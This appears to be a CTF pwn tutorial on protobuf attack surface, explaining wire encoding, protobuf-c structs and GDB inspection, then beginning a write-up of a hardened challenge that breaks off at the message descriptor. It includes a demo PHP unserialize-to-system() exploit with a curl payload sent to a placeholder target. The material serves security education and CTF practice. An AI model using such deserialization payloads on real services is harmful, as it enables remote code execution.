0 TL;DR

Modern PWN CTFs have drifted far from the comfortable pastures of classic BOFs, UAFs, or the House-of-whatever heap rituals. Today the arena is littered with MIPS firmware, custom VMs, compiler traps, rogue C2 servers, etc.

Among these, one pattern is showing up more often: protobuf-based attack surface.

1 SETUP

For pwning, we don't need a full gRPC microservice zoo. We just want three things:

  1. protoc – compile / encode / decode messages
  2. Python tooling – quick scripts to fuzz / craft payloads
  3. Optionally, a helper to peek into protobuf descriptors (e.g. pbtk)

1.1 Protobuf Compiler

Install protobuf compiler (protoc).

Ubuntu / Debian:

Bash
sudo apt update
sudo apt install -y protobuf-compiler libprotobuf-dev

Arch Linux:

Bash
sudo pacman -S protobuf

Verify:

Bash
protoc --version

1.2 Python Libraries

Payload scripting requires these modules:

Bash
python -m pip install \
    protobuf \
    grpcio \
    grpcio-tools \
    googleapis-common-protos

This gives us:

  • protoc bindings from Python
  • grpc_tools.protoc for generating stubs if needed
  • a comfortable environment for building / mutating protobuf payloads.

1.3 Protobuf Toolkit

Optionally, pbtk is handy for inspecting protobuf descriptors and browsing message structures. Installation steps:

Bash
# clone repo
git clone https://github.com/marin-m/pbtk
cd pbtk

# use standalone python venv
python -m venv .venv
source .venv/bin/activate
pip install protobuf pyqt5 pyqtwebengine requests websocket-client

The GUI can be lanched through the main script gui.py:

pwn_protobuf_0

Use standalone scripts without GUI:

Bash
cd extractors

python from_binary.py [-h] input_file [output_dir]
python jar_extract.py [-h] input_file [output_dir]
python web_extract.py [-h] input_url [output_dir]

The repo is aging and relies on outdated dependencies. In tighter environments, reliability is not guaranteed (but we can twist the from_binary.py by identifying protobuf magic instead to work for any cases).

2 PROTOBUF

We skip Google's marketing definitions. This is protobuf viewed from the attacker's side.

2.1 JSON vs. Protobuf

2.1.1 JSON Serialization Format

When most developers think about data interchange, their instincts cling to JSON — readable, forgiving, and easy to misuse. A classic PHP deserialization vulnerability looks like this:

PHP
<?php

// vuln.php

class VulnObject {
    public $cmd;

    public function __destruct() {
        system($this->cmd);
    }
}

// [!] Vulnerable: directly unserialize() attacker-controlled input
unserialize($_POST['data']);

That's the whole bug: attacker → unserialize() → arbitrary object → destructor → code execution.

If the backend naïvely decodes this into a PHP structure and feeds it into an unserialization sink, we get the classic PHP deserialization attack surface. A minimal, textbook example looks like:

PHP
<?php

// exploit.php

class VulnObject { public $cmd; }

$e = new VulnObject();
$e->cmd = 'touch /tmp/pwned';

echo serialize($e) . PHP_EOL;

Running it produces something like:

JSON
O:10:"VulnObject":1:{s:3:"cmd";s:15:"touch /tmp/pwned";}

And exploitation is simply:

Bash
curl -X POST http://target/vuln.php \
     --data-urlencode 'data=O:10:"EvilObject":1:{s:3:"cmd";s:15:"touch /tmp/pwned";}'

At that point, the server unserializes the attacker's crafted VulnObject. And when the script ends,__destruct() fires and executes the command—this is the familiar deserialization playground most CTF players know.

But protobuf changes everything: no object strings, no visible fields — only binary tags, wire types, and length-delimited traps hiding the same level of power in a far more opaque form.

1.1.2 Binary Serialization Format

Protobuf looks nothing like the readable PHP serialization example above. Beneath ordinary traffic, it hides a far more discreet dialect: Protocol Buffers, Google's compact binary serialization format.

A protobuf blob looks like noise:

pwn_protobuf_1

The output is a binary maze—tags, wire types, and length fields stitched together with strict structure and even stricter expectations.

Unlike JSON, protobuf carries:

  • no field names
  • no delimiters
  • no visible structure

Just bytes.

Disassemble our demo tiny protobuf message (from User { id: 1337, name: "Axura" }) under binary level:

08               → field 1 (id), wire type 0 (varint)
b9 0a            → varint 1337
12               → field 2 (name), wire type 2 (length-delimited)
05               → length = 5
41 78 75 72 61"Axura"

—super minimal but very enlightening. Every piece of meaning—identity, boundaries, type—is encoded as numeric tags + wire types, forming a schema-bound contract enforced by .proto definitions.

2.2 Protobuf 101

For full documentation, see the official reference: https://protobuf.dev/

2.2.1 Message Definition

Every protobuf message type is defined in a .proto file — this is the authoritative description of the message's structure:

  • field names → used in source code
  • field types → determine how values are encoded
  • field numbers (tags) → define the binary identity of each field
  • features / editions → control optional language behaviors

Example:

proto
message User {
    int32  id     = 1;
    string name   = 2;
    bytes  avatar = 3;
}

Each field has two identities in this message:

2.2.1.1 Field name

id, name, avatar

  • Used only in source code (User().name, User().avatar, etc.).
  • After compilation, the name string resides in .rodata section.

2.2.1.2 Field number (tag)

1, 2, 3

  • Used only in the binary wire format.
  • Determines how the field is encoded and decoded.
  • Must never change once deployed.
  • Defines the real "shape" of the message on the wire.

This distinction is vital in pwn challenges:

When decoding, protobuf parsers look only at field numbers and wire types — field names do not exist in the binary stream—field names help humans, while field numbers define reality.

2.2.1.3 Editions

In modern protobuf, an edition defines the language-level features available to the .proto file — things like UTF-8 validation, optional semantics, repeated field encoding rules, and other behaviors that used to be tied to the traditional proto2 / proto3.

We can declare the edition directly:

proto
edition = "2024";
// syntax = "proto2";
// syntax = "proto3";

message User {
    int32 id = 1;
    string name = 2;
}

Official docs:

Here we should remember:

  • Editions modify only language-level features, NOT the wire format —a crucial property when reversing or exploiting protobuf-based binaries.
  • Newer editions may add or enforce safety checks (e.g., UTF-8 validation).
  • Editions define the default semantics, but individual fields may override features if needed.
  • A decoder does not know whether the sender used proto2 or proto3.

Although modern protobuf introduces "Editions" and the traditional syntax = "proto2" / "proto3" distinction, these differences do not affect the wire format—the decoder only cares about field numbers and wire types, not the .proto syntax used to generate them.

2.2.3 Wire Format

2.2.3.1 Wire types

Protobuf defines six wire types:

Wire TypeMeaningTypical Fields
0Varintint32, int64, bool
164-bitfixed64, double
2Length-delimitedstring, bytes, embedded messages
3 / 4Groups (deprecated)legacy structured fields
532-bitfixed32, float

We will use our example message definition for illustration:

proto
syntax = "proto3";
    
message User {
    int32  id     = 1;  // varint
    string name   = 2;  // length-delimited
    bytes  avatar = 3;  // length-delimited
}

The generated protobuf message (from User { id: 1337, name: "Axura" }):

00000000: 08 b9 0a 12 05 41 78 75 72 61    .....Axura

When a protobuf message is encoded, everything ultimately becomes a flat sequence of:

[field_key] [field_value]

Where field_key is a single varint computed as:

field_key = (field_number << 3) | wire_type

Our message thus can be illustrated as:

pwn_protobuf_3

2.2.3.2 Varint

Varint (variable-length integer) encodes integers in 7-bit chunks, little-endian, with the MSB as a "more bytes follow" flag:

  • lower 7 bits in each byte = data
  • MSB (bit 7):
    • 1 → there is another byte
    • 0 → this is the last byte

In Python perspective, given an unsigned integer n:

Python
bytes = []
"""
0x80 == 0b10000000
0x7f == 0b01111111
"""
while n >= 0x80:	
    # take lowest 7 bits + mark 'more bytes follow'
    bytes.append( (n & 0x7f) | 0x80 )	
    n >>= 7			# shift right by 7 bits 
# last chunk: just the remaining 7 bits, MSB = 0
bytes.append(n)

In our example (field 1: id = 1337), the 1st part representing field_key can be encoded as:

  • type = int32 → wire type 0 (varint)
  • field_number = 1 (< 0x80)
  • It's a field_key. So apply field_key = (field_number << 3) | wire_type
    • field_key = (1 << 3) | 0 = 8 = 0x08

So the varint(1) as the field_key is:

[ 0x08 ]

On the other hand, the field_value for the this field_key is also in32 type:

  • type = int32 → wire type 0 (varint)
  • field_value = 1337 (>= 0x80)
  • First byte:
    • Take lowest 7 bits: n & 0x7f = 1337 & 127 = 57 (0x39)
    • Mark "more bytes follow" by setting MSB = 1: 0x39 | 0x80 = 0xB9
  • Second byte:
    • Shift right by 7 bits (drop already processed bits): n >>= 7 → 1337 >> 7 = floor(1337 / 128) = 10
    • Now n = 10 (< 0x80), so 2nd (last) byte is just 0x0A

So the varint(1337) bytes as the field_value are:

[ 0xB9, 0x0A ]

And eventually, the whole wire bytes for id field is:

08 b9 0a

2.2.3.3 Wire type 2

For pwn engineers, wire type 2 (length-delimited) is the most dangerous:

The length itself is a varint, and parsers must trust it.

This wire type is used for:

  • strings
  • bytes
  • repeated packed fields
  • embedded messages

Its structure:

[<tag>|2] [length: varint] [raw bytes]

For a parser:

  1. Read "length"
  2. Allocate memory / copy bytes
  3. Recursively decode if it's another message

In our simple example (field 2: name = "Axura"), the 1st part (length) can be encoded as:

  • type = string → wire type 2 (length-delimited)
  • field_number (tag) = 2
  • field_key = (2 << 3) | 2 = 18 = 0x12

The 2nd part holds the 5-byte string "Axura", then:

  • length = 05 (< 0x80)
    • varint(5) = 0x5, MSB = 0
  • data = 41 78 75 72 61

So the full bytes for the name field's payload are:

05 41 78 75 72 61

Put together with the tag (0x12 for field 2, wire type 2), we get:

12 05 41 78 75 72 61
^^ ^^ ^^^^^^^^^^^^^^
│  │        └── value bytes ("Axura")
│  └── length = 5 (varint)
└──── field_key = tag 2, wire type 2

2.2.4 Embedded Messages

So far we've only looked at flat fields. Protobuf gets more interesting (and more dangerous) when messages start containing other messages.

Let's extend our previous example:

proto
message User {
    int32  id     = 1;
    string name   = 2;
    bytes  avatar = 3;
}

message Profile {
    User   user   = 1;  // embedded message
    string status = 2;
}

On the wire, embedded messages are still just length-delimited fields (wire type 2):

[tag(user)|2]   [len_user]   [  ... bytes of encoded User ...  ]
[tag(status)|2] [len_status] [ status bytes ]

If we reuse the earlier User instance:

proto
User {
  id   = 1337;
  name = "Axura";
}

we already know its bytes:

08 b9 0a 12 05 41 78 75 72 61

When it's embedded as Profile.user, the encoder wraps that in a length-delimited field:

  • field_number = 1
  • wire type = 2 (length-delimited)
  • field_key = (1 << 3) | 2 = 0x0a

So the user field in Profile becomes:

0a 0a 08 b9 0a 12 05 41 78 75 72 61
^^ ^^
│  └─ length = 0x0a (10 bytes of embedded User)
└──── tag=1, wire_type=2

Then status is just another length-delimited field after that.

2.3 Python Handler

Hand-crafting varints is fun once. After that, we want tooling.

We'll assume this message definition:

proto
// user.proto
syntax = "proto3";

message User {
    int32  id     = 1;
    string name   = 2;
    bytes  avatar = 3;
}

2.3.1 Python Bindings

First, make sure we have the protobuf Python package installed:

Bash
pip install protobuf

Then use protoc to generate Python bindings:

Bash
protoc --python_out=. user.proto

This produces ./user_pb2.py:

Python
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler.  DO NOT EDIT!
# NO CHECKED-IN PROTOBUF GENCODE
# source: user.proto
# Protobuf Python Version: 5.29.2
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import descriptor_pool as _descriptor_pool
from google.protobuf import runtime_version as _runtime_version
from google.protobuf import symbol_database as _symbol_database
from google.protobuf.internal import builder as _builder
_runtime_version.ValidateProtobufRuntimeVersion(
    _runtime_version.Domain.PUBLIC,
    5,
    29,
    2,
    '',
    'user.proto'
)
# @@protoc_insertion_point(imports)

_sym_db = _symbol_database.Default()

DESCRIPTOR = _descriptor_pool.Default().AddSerializedFile(b'\n\nuser.proto\"0\n\x04User\x12\n\n\x02id\x18\x01 \x01(\x05\x12\x0c\n\x04name\x18\x02 \x01(\t\x12\x0e\n\x06\x61vatar\x18\x03 \x01(\x0c\x62\x06proto3')

_globals = globals()
_builder.BuildMessageAndEnumDescriptors(DESCRIPTOR, _globals)
_builder.BuildTopDescriptorsAndMessages(DESCRIPTOR, 'user_pb2', _globals)
if not _descriptor._USE_C_DESCRIPTORS:
  DESCRIPTOR._loaded_options = None
  _globals['_USER']._serialized_start=14
  _globals['_USER']._serialized_end=62
# @@protoc_insertion_point(module_scope)

We don't need to care about the internals for pwn. What matters is:

  • It defines a Python class User that matches our .proto.
  • That class knows how to encode and decode protobuf wire format.

2.3.2 Template Scripts

Once user_pb2.py is generated, we can import User in the pwn script and let the protobuf library handle all the varints / field keys for us.

Python
# exploit.py
from user_pb2 import User

def build_user(id_val, name_val, avatar_bytes=b""):
    u = User()              # create a new message instance
    u.id = id_val           # assign scalar field
    u.name = name_val       # assign string field
    if avatar_bytes:
        u.avatar = avatar_bytes		# assign bytes field
    return u.SerializeToString()	# → raw protobuf bytes

if __name__ == "__main__":
    pb = build_user(1337, "Axura", b"\x01\x02\xff")
    
    # in real exploit: send blob to remote 
    print(pb.hex())			# 08b90a120541787572611a030102ff

Decoding captured traffic or server responses works symmetrically:

Python
from user_pb2 import User

def parse_user(data: bytes) -> User:
    u = User()
    u.ParseFromString(data)   # parse raw protobuf → fill fields
    return u

# sample:
# u = parse_user(captured_bytes)
# print(u.id, u.name, u.avatar)

Now instead of manually guessing varints, we:

  • define the structure once in .proto,
  • let protoc generate the bindings,
  • and focus on abusing how the target uses the decoded fields (sizes, indexes, pointers, etc.).

2.3.3 Python APIs

After importing User and let the protobuf runtime deal with varints and field keys.

Python
from user_pb2 import User

We are ready to explore more API usages with protobuf buffer manipulation.

2.3.3.1 Encoding messages

Python
u = User()          		# new empty message
u.id = 1337         		# scalar
u.name = "Axura"    		# string
u.avatar = b"\x01\x02\xff"  # bytes

pb = u.SerializeToString()	# → raw protobuf bytes

SerializeToString() is the method we'll call before send() in your pwn script.

There's also:

Python
u.ByteSize()        # how many bytes the serialized message would use

Useful if the service expects a length-prefixed protobuf (e.g. [4-byte length][protobuf bytes]).

2.3.3.2 Decoding messages

Python
u = User()
u.ParseFromString(data)   # in-place parse

There is also a class-level helper in newer versions:

Python
u = User.FromString(data)   # same effect as ParseFromString into a new object

2.3.3.3 Inspecting fields

List all populated fields:

Python
u = User.FromString(data)
for desc, value in u.ListFields():
    print(desc.name, value)

Clear a field explicitly:

Python
u.ClearField("avatar")

Reset whole message:

Python
u.Clear()

2.3.3.4 Repeated fields

If the challenge uses repeated fields (arrays / lists), we get a list-like object:

Python
"""
message Packet {
    repeated uint32 ids = 1;
}
"""
from packet_pb2 import Packet

p = Packet()
p.ids.append(1)
p.ids.extend([2, 3, 4])

print(p.ids)         # [1, 2, 3, 4]
p.ids[0] = 1337      # index assignment
del p.ids[1]         # delete element

Typical pwn use: heap spraying through many repeated elements, or abusing the server's logic that loops over len(ids).

2.3.3.5 Oneof

If the CTF challenge uses oneof (e.g. message "choice" / command cases), protobuf gives us a small helper:

proto
syntax = "proto3";

message Msg {
  oneof op {
    uint32 create = 1;
    uint32 edit   = 2;
    uint32 show   = 3;
  }
}

Python side:

Python
from msg_pb2 import Msg

m = Msg()

# which field in this oneof is currently set?
m.create = 1
print(m.WhichOneof("op"))  # "create"
m.edit = 9
print(m.WhichOneof("op"))  # "edit"

WhichOneof() is handy when parsing unknown blobs and trying to see which action the server thinks it's handling.

2.3.3.6 Copying / merging messages

When we want to tweak only parts of a base template:

Python
base = User(id=1, name="base")
mut = User()
mut.CopyFrom(base)          # deep copy
mut.id = 1337               # modify one field

or merge partial messages:

Python
a = User(id=1)
b = User(name="Axura")
a.MergeFrom(b)              # a now has id=1, name="Axura"

In fuzzing, this lets us keep a "known-good" skeleton and mutate only the fields we care about.

2.4 Low-Level Protobuf

So far we've treated protobuf as a clean Python API. On the C side, things are much more interesting for pwn: messages are just structs in memory with predictable layouts.

2.4.1 Debug Protobuf

Wire type 2 is critical in protobuf-based pwn. It represents length-delimited fields: a varint length, followed by raw bytes. Used for both string or bytes, but parsed differently — Because the type specified in a message descriptor does not necessarily correspond to the wire type used in the actual protobuf encoding.

2.4.1.1 Setup Demo

We use the same example user.proto schema:

proto
syntax = "proto3";

message User {
    int32  id     = 1;
    string name   = 2;
    bytes  avatar = 3;
}

Compile for Python:

Bash
# generate user_pb2.py
protoc --python_out=. user.proto

The payload builder build_user.py consumes the created user_pb2.py as a dependency, outputs protocol buffer binary user.bin:

Python
from user_pb2 import User

def build_user(id_val, name_val, avatar_bytes=b""):
    u = User()
    u.id = id_val
    u.name = name_val
    if avatar_bytes:
        u.avatar = avatar_bytes
    return u.SerializeToString()

if __name__ == "__main__":
    blob = build_user(1337, "Axura", b"\x01\x02\xff")
    # write to file so C side can read it
    with open("user.bin", "wb") as f:
        f.write(blob)

Now prepare the C-side parser. Compile the same schema using protoc-c (old-school alias):

Bash
# generate user.pb-c.h, user.pb-c.c
protoc --c_out=. user.proto

The C parser parse_user.c will read user.bin, deserialize it using the generated bindings, and pause for inspection:

C
// parse_user.c
#include "user.pb-c.h"
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

int main(void) {
    FILE *f = fopen("user.bin", "rb");
    if (!f) {
        perror("fopen user.bin");
        return 1;
    }

    // get file size
    if (fseek(f, 0, SEEK_END) != 0) {
        perror("fseek");
        fclose(f);
        return 1;
    }
    long flen = ftell(f);
    if (flen < 0) {
        perror("ftell");
        fclose(f);
        return 1;
    }
    rewind(f);

    // read protobuf file into buf
    size_t len = (size_t)flen;
    unsigned char *buf = malloc(len);
    if (!buf) {
        perror("malloc");
        fclose(f);
        return 1;
    }

    if (fread(buf, 1, len, f) != len) {
        perror("fread");
        free(buf);
        fclose(f);
        return 1;
    }
    fclose(f);

    // unpack using protobuf-c
    User *u = user__unpack(NULL, len, buf);
    if (!u) {
        fprintf(stderr, "unpack failed\n");
        free(buf);
        return 1;
    }

    printf("len(user.bin) = %zu\n", len);
    printf("id            = %d\n", u->id);
    printf("name          = %s\n", u->name);
    printf("avatar.len    = %zu\n", u->avatar.len);

    puts("ready for gdb; press Enter to free");
    getchar(); 

    user__free_unpacked(u, NULL);
    free(buf);
    return 0;
}

Build:

Bash
# build parse_user binary
gcc -g parse_user.c user.pb-c.c -lprotobuf-c -o parse_user                                         

Dump the serialized protobuf payload from the generated user.bin:

$ xxd -g1 user.bin
00000000: 08 b9 0a 12 05 41 78 75 72 61 1a 03 01 02 ff     .....Axura.....

Dissection:

08 b9 0a 12 05 41 78 75 72 61 1a 03 01 02 ff
         ^^ ^^ ^^^^^^^^^^^^^^ ^^ ^^ ^^^^^^^^
         │  │       │         │  │   └─ avatar bytes
         │  │       │         │  └─ length=3
         │  │       │         └─ tag=3 (avatar)
         │  │       └─ "Axura"
         │  └─ length=5
         └─ tag=2 (name)

At the wire level, string name and bytes avatar are both wire-type-2 layout:

[tag|2] [length varint] [length bytes of data]

But internally, the parser handles them differently. The parser consults the schema descriptors and maps each tag to a type.

2.4.1.2 Debugging

Use GDB to inspect protobuf internals at runtime:

Bash
# start gdb to debug
gdb ./parse_user

# inside gdb, set breakpoints:
gdb> b 49	# after message created && before free'd
gdb> b user__unpack
gdb> b user__free_unpacked
gdb> r < user.bin

At user__unpack (calling protobuf_c_message_unpack), the parser starts decoding the wire format:

pwn_protobuf_5

The serialized message buf matches user.bin (of course):

  • 08 → field 1, wire type 0 (id)
  • b9 0a → varint(1337)
  • 12 → field 2, wire type 2 (name)
  • 05 → length = 5, the string length
  • 41 78 75 72 61"Axura"
  • 1a → field 3, wire type 2 (avatar)
  • 03 → length = 3
  • 01 02 ff → avatar bytes

Resume until breakpoint after unpacking. The struct instance (User u) is initialized in memory:

pwn_protobuf_4

String length specifier 0x5 is consumed, while the length specifier 0x3 for bytes data remains. From the wire perspective, both field 2 and field 3 are just:

[tag=2, wt=2] [len=5] [5 bytes]
[tag=3, wt=2] [len=3] [3 bytes]

Although nothing in the bytes says:

  • "field 2 is string, must be UTF-8"
  • "field 3 is raw bytes"

—at the end, they are parsed differently. Because the schema (user.proto) declares:

proto
message User {
    int32  id     = 1;
    string name   = 2;  // <-- STRING
    bytes  avatar = 3;  // <-- BYTES
}

protoc turns that into C code + a descriptor in user.pb-c.c (or user_pb2.py when imported by Python):

  • a User struct
  • a user__descriptor object
  • an array of field descriptors

To inspect those internal descriptors, we can stop at the last breakpoint user__free_unpacked (calling protobuf_c_message_free_unpacked):

gdb> set $u = (User *)$rdi
pwn_protobuf_6

Next, we will take a deeper dive into all those mentioned C structures.

2.4.2 Protobuf Internals

All C structures in this demo are generated by protoc and defined in user.pb-c.h and user.pb-c.c.

2.4.2.1 Base Header

Every generated C struct starts with a common header:

C
struct ProtobufCMessage {
    const ProtobufCMessageDescriptor *descriptor;	// 8 bytes (ptr)
    unsigned n_unknown_fields;           			    // 8 bytes (size_t on x86-64)
    ProtobufCUnknownField *unknown_fields;			  // 8 bytes (ptr)
};  // → 24 bytes total on x86-64

This "base" is embedded as the first field of every message. We can view the message structure in user.pb-c.h:

C
struct  User
{
    ProtobufCMessage base;
    int32_t id;
    char *name;
    ProtobufCBinaryData avatar;
};

Inspect our demo in GDB:

pwn_protobuf_7

After parsing, the User struct is heap-allocated. Its first 0x18 bytes contain the ProtobufCMessage base — a header that always precedes the parsed message content.

2.4.2.2 Descriptors

The base header (ProtobufCMessage) points to a ProtobufCMessageDescriptor. It describes how the message should be parsed by the protobuf engine.

pwn_protobuf_8

In our runtime demo, the User instance has an actual sizeof_message of 56 (0x38):

pwn_protobuf_9

When the parser calls:

C
User *u = user__unpack(NULL, len, buf);

that becomes:

C
protobuf_c_message_unpack(&user__descriptor, allocator, len, buf);
pwn_protobuf_10

The ProtobufCMessageDescriptor we just printed drives everything.

First, it verifies if "this is a valid message type" (so we cannot self customize one during attack):

C
assert(descriptor->magic == PROTOBUF_C__MESSAGE_DESCRIPTOR_MAGIC);

That magic field is 682290937 (0x28AAEEF9), a sanity check.

gdb> p (*($u->base.descriptor)).magic
$2 = 682290937

Then it allocates and initializes the C struct according to the sizeof_message and message_init members inside that message descriptor (ProtobufCMessageDescriptor):

C
// sizeof_message = 56 (0x38) → sizeof(User)
msg = allocator->alloc(allocator, descriptor->sizeof_message);
memset(msg, 0, descriptor->sizeof_message);

// call message_init (here: user__init)
descriptor->message_init(msg);

That message_init pointer is user__init defined in user.pb-c.c:

C
void user__init(User *message) {
    static const User init_value = USER__INIT;
    *message = init_value;
}

which applies USER__INIT from user.pb-c.h:

C
#define USER__INIT \
 { PROTOBUF_C_MESSAGE_INIT (&user__descriptor) \
, 0, (char *)protobuf_c_empty_string, {0,NULL} }

So a freshly-initialized User in memory starts as:

  • base.descriptor = &user__descriptor
  • base.n_unknown_fields = 0, base.unknown_fields = NULL
  • id = 0
  • name = "" (actually protobuf_c_empty_string in .rodata)
  • avatar = { .len = 0, .data = NULL }

That base (base) is the schema bridge: base.descriptor points to the ProtobufCMessageDescriptor, which defines how this struct is parsed and serialized.

From user.pb-c.c we see:

C
const ProtobufCMessageDescriptor user__descriptor = {
    PROTOBUF_C__MESSAGE_DESCRIPTOR_MAGIC,
    "User",
    "User",
    "User",
    "",
    sizeof(User),               // 56 bytes for User
    3,                          // number of fields
    user__field_descriptors,    // ← field table
    user__field_indices_by_name,
    1, user__number_ranges,
    (ProtobufCMessageInit) user__init,
    NULL, NULL, NULL
};

The critical part for us is user__field_descriptors: a C array of ProtobufCFieldDescriptor entries that map wire-level field numbers to concrete C layout:

pwn_protobuf_11

Inspect those fields in our runtime demo:

gdb> set $d = (ProtobufCMessageDescriptor *)$u->base
gdb> set $f = $d->fields
gdb> p $f[0]
gdb> p $f[1]
gdb> p $f[2]
pwn_protobuf_12

So at decode time, the generic engine sees the wire:

field_number = N
wire_type    = 0 / 1 / 2 / 5 / ...

It looks up the field descriptor (one of those $f[i]) using:

  • fd->typewhat this field is (INT32 / STRING / BYTES / MESSAGE / ENUM)
  • fd->offsetwhere in the struct to store it ((uint8_t *)msg + offset)
  • fd->descriptor → sub-message / enum descriptor if type is MESSAGE / ENUM
  • fd->default_value → default for unset fields (like protobuf_c_empty_string)

Then decodes and stores accordingly:

  • PROTOBUF_C_TYPE_INT32 → read varint, write int32_t at msg + offset
  • PROTOBUF_C_TYPE_STRING → read length, malloc(len+1), NUL-terminate, store char * at msg + offset
  • PROTOBUF_C_TYPE_BYTES → read length, malloc(len), store into ((ProtobufCBinaryData *)(msg+offset))->len/data

The name strings reside adjacently in .rodata:

pwn_protobuf_13

In conclusion, at runtime the generic parser (protobuf_c_message_unpack / protobuf_c_message_pack) uses exactly these:

  • descriptor->sizeof_message + message_init → how big the struct is and how to zero/default it.
  • descriptor->fields[i].type + descriptor->fields[i].offset + descriptor->fields[i].idfor field number N on the wire, with wire-type, write the decoded value into (uint8_t *)msg + offset and interpret it as INT32 / STRING / BYTES accordingly.

2.4.2.3 ProtobufCBinaryData

During reverse engineering, the protobuf side of a binary often appears as meaningless pointer arithmetic. In IDA, for instance, we might see:

IDA Decompiler
v9 = msg__msg__unpack(0, buf, ptr);
if ( !v9 )
    break;

switch ( *(_DWORD *)(v9 + 24) )       // choice
{
  case 0:
    create(*(_QWORD *)(v9 + 40),      // ??
           *(_QWORD *)(v9 + 48));     // ??
    break;

  case 1:
    delete(*(_QWORD *)(v9 + 32));     // ??
    break;

  case 2:
    edit(*(_QWORD *)(v9 + 32),        // ??
         *(_QWORD *)(v9 + 40),        // ??
         *(_QWORD *)(v9 + 48));       // ??
    break;

  case 3:
    show(*(_QWORD *)(v9 + 32));       // ??
    break;
}

We're not reversing this function in detail, but we do need to understand what structures are being referenced—especially when IDA highlights callsites like:

C
create(*(_QWORD *)(v9 + 40), *(_QWORD *)(v9 + 48));

Once we recognise v9 as a protobuf-c message, this pattern stops being random pointer salad. What it's really doing is:

  • 1st argument: a size or count that we control
  • 2nd argument: a heap pointer to a buffer we also control

That pair doesn't come from thin air. It comes from a protobuf bytes field (wire type 2), which protobuf-c materializes as a ProtobufCBinaryData:

C
struct ProtobufCBinaryData {
    size_t   len;   // decoded length from the wire
    uint8_t *data;  // heap pointer to the bytes
};

In many protobuf-pwn setups, those QWORD pairs in IDA — length and pointer — often come straight from a bytes field, parsed into a ProtobufCBinaryData—giving us a classic (len, ptr) primitive directly controlled by our crafted message.

3. PWN

Understanding protobuf's wire format and the corresponding C structures means the reversing phase becomes direct: the message fields appear in memory as predictable (len, ptr) pairs and fixed layouts, making protobuf-based binaries easy to analyze and control.

3.1 Custom Protobuf

I previously wrote a pwn analysis (link) covering UAF, FILE-style exploitation, VM behavior, and serialization bugs. That challenge used a protobuf-inspired VM interface — and once we understand how real protobuf encodes fields and structures, reversing these custom variants becomes straightforward.

3.2 Real Protobuf

Some binaries use the original protobuf parser directly. This challenge (download) is a clean example: standard protobuf-c message parsing, RC4 decryption, and an alphanumeric shellcode requirement.

3.2.1 Setup

The challenge provides a libprotobuf-c.so.1 file. After decompressing the archive, patch the target binary to link against the provided shared object:

Bash
# backup
cp protobuf_rc4_alpha pwn

# patch rpath to pwd
patchelf --set-rpath . ./pwn

Target is fully hardened:

$ checksec pwn
    Arch:       amd64-64-little
    RELRO:      Full RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        PIE enabled
    SHSTK:      Enabled
    IBT:        Enabled

The challenge does not ship with a libc, so we'll need to leak addresses to fingerprint libc, or craft an exploit path without relying on ret2libc.

Initial fuzzing with long input shows a memory leak:

pwn_protobuf_16

3.2.2 Reversing

3.2.2.1 Junk Instructions

IDA fails to decompile main due to junk control flow surrounding a suspicious call site:

pwn_protobuf_17

This is just an obfuscated unconditional jump implemented via two conditional branches. Both land at 0x1FA4 (i.e., loc_1FA1 + 3), which:

  • Sits a NOP instruction (0x90)
  • Next 0x48 at 1FA5 is the REX prefix for lea, turning the upcoming lea eax into lea rax.

NOP-ing ou those instruction in between to make IDA feel comfortable. After a "UDP" patch IDA correctly renders the disassembly:

pwn_protobuf_18

Once patched, press "P" on the int main() region to recover decompiled code. But it ends with a pointless return sub_1FFF();:

pwn_protobuf_19

sub_1FFF is just jmp loc_1F45. Everything else is just an indirect tail-jump + extra layer of indirection = junk / obfuscation.

So we just need to replace:

IDA
.text:0000000000001FEE 48 8D 05 0A 00                 lea     rax, sub_1FFF
.text:0000000000001FF5 FF E0                          jmp     rax

With a single:

ASM
jmp loc_1F45

And pad the remaining bytes with NOPs.

Now the disassembly is stable and clean:

pwn_protobuf_20

3.2.2.2 Backdoor

From the above code:

C
__isoc99_scanf("%llx", v3);
if ( (char *)v3[0] == "yes" )

This is NOT a string comparison, but a pointer equality check. So under that interpretation, this is a deliberate backdoor:

"If you know the address of "yes", you get the prize."

And we do. It's the .rodata string that the binary is comparing against:

IDA
.rodata:0000000000003041 79 65 73 00    aYes            db 'yes',0   

But to reach that, we first need to leak the .text base address.

3.2.2.3 Leak Text Base

The binary offers a straightforward leak:

C
__isoc99_scanf("%d", &dword_5008);
if ( dword_5008 <= 255 )
  	printf("%p", &dword_5008);

By supplying any input ≤ 255, we trigger the leak of a global .data address:

IDA
.data:0000000000005008 0A 00 00 00    dword_5008      dd 0Ah  
pwn_protobuf_22

From there, we can calculate the offset to .rodata, where the "yes" string resides.

3.2.2.4 Protobuf

Once the "yes" comparison is bypassed, execution enters backdoor sub_1D96, which at first looks noisy:

pwn_protobuf_21

It reads 0x100 bytes and calls a validation routine:

C
__int64 __fastcall sub_218D(__int64 a1, __int64 a2, __int64 a3)
{
  return protobuf_c_message_unpack(&unk_4C40, a1, a2, a3);
}

This is just a call to protobuf_c_message_unpack with a hardcoded ProtobufCMessageDescriptor at &unk_4C40, used to parse our input. And store the parsed result with a global pointer qword_5058.

Earlier in this writeup, we already dissected how descriptors like this define the schema at runtime. The &unk_4C40 holds the message descriptor (ProtobufCMessageDescriptor):

IDA
.data.rel.ro:0000000000004C40 F9             unk_4C40        db 0F9h                 ; DATA XREF: sub_2004+5B↑o
.data.rel.ro:0000000000004C40                                                        ; sub_206C+17↑o ...
.data.rel.ro:0000000000004C41 EE                             db 0EEh
.data.rel.ro:0000000000004C42 AA                             db 0AAh
.data.rel.ro:0000000000004C43 28                             db  28h ; (
.data.rel.ro:0000000000004C44 00                             db    0
.data.rel.ro:0000000000004C45 00                             db    0
.data.rel.ro:0000000000004C46 00                             db    0
.data.rel.ro:0000000000004C47 00                             db    0
.data.rel.ro:0000000000004C48 30 31 00 00 00dq offset aGiaoMsgiao   ; "giao.msgiao"
.data.rel.ro:0000000000004C50 3C 31 00 00 00dq offset aMsgiao       ; "Msgiao"
.data.rel.ro:0000000000004C58 43 31 00 00 00dq offset aGiaoMsgiao_0 ; "Giao__Msgiao"
.data.rel.ro:0000000000004C60 50 31 00 00 00dq offset aGiao         ; "giao"
.data.rel.ro:0000000000004C68 48                             db  48h ; H
.data.rel.ro:0000000000004C69 00                             db    0
.data.rel.ro:0000000000004C6A 00                             db    0
.data.rel.ro:0000000000004C6B 00                             db    0
